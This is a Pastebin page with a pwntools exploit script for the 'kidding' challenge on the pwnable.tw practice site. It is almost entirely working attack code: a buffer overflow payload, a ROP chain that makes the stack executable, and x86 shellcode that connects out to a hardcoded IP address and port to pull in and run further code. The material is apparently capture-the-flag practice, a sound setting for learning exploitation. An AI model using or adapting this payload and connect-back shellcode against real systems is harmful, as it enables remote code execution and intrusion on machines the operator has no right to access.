Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import time
- from pwn import *
- env = {
- "LD_PRELOAD": "/home/nghiadt/Desktop/pwnable.tw/secret_of_heart/libc_64.so.6"
- }
- libc=ELF("/home/nghiadt/Desktop/pwnable.tw/secret_of_heart/libc_64.so.6")
- context(os='linux', arch='i386', log_level='debug')
- def attach(listBp=[]):
- gdb.attach(r,gdbscript=createGDBScript(listBp,pie=False))
- def createGDBScript(listBp,pie=False):
- log.info("GDB script");
- script =""
- if (pie):
- script+='''
- codebase
- '''
- for a in listBp:
- if (pie):
- script+="b * $piebase + "+hex(a)+"\n"
- else :
- script+="b * "+hex(a)+"\n"
- script+='''
- b* 0x80b8547
- commands
- '''
- script+="n\n"*50+"\nend\n"
- script+="c\n"
- #log.info(script);
- return script
- if len(sys.argv) >1:
- flag=1
- r = remote("chall.pwnable.tw", 10303)
- else:
- flag=0
- r = process("./kidding",aslr=True,env=env)
- def main():
- #set 0x0805462b mov [edx], eax
- #0x0806ec8b POP EDX RET
- #0x080b8536 POP EAX RET
- #attach()
- payload=""
- payload=payload.ljust(12,"A")
- payload+=p32(0x0806ec8b)# POP EDX RET
- payload+=p32(0x080E9FEC)#EDX
- payload+=p32(0x080b8536)#POP EAX RET
- payload+=p32(0x7)
- payload+=p32(0x0805462b)#mov [edx], eax
- payload+=p32(0x080b8536)#POP EAX RET
- payload+=p32(0x080E9FC8)#__libc_stack_end
- payload+=p32(0x0809A080)#_dl_make_stack_executable
- payload+=p32(0x080b8546)#push esp;ret
- payload+=asm('''
- push eax
- push 0x01
- push 0x02
- mov ecx, esp
- mov al, 0x66
- xor ebx, ebx
- mov bl, 0x01
- int 0x80
- mov bl,0x3
- push 0x2e811c95
- pushw 0x672b
- pushw 0x2
- mov ecx,esp
- push 0x10
- push ecx
- push eax
- mov al, 0x66
- mov ecx,esp
- int 0x80
- xchg al,bl
- xor ebx,ebx
- mov edx,esi
- mov ecx,esp
- int 0x80
- ''')
- log.info("Length shellcode: "+str(len(payload)))
- r.send(payload)
- r.interactive()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
